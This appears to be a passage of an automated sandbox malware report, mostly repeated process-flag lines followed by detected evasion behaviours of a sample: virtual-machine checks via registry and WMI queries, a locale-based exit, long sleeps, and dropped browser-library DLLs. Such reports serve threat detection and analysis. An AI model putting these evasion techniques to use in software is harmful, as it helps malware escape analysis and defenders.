Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 21717A90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 21731340000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1000000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2B20000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2920000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1870000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 31E0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 51E0000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 4312
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 5301
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 7677
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 1129

Found decision node followed by non-executed suspicious APIs

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u2ts.2\relay.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u2ts.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dvffdl	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jipsoiol	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	API coverage: 9.9 %
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API coverage: 4.8 %
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	API coverage: 1.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 7540	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 7544	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6756	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6756	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -35511s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6756	Thread sleep time: -59836s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -40234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6756	Thread sleep time: -59718s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -48864s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6756	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -32845s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -51147s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -56452s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -30442s >= -30000s
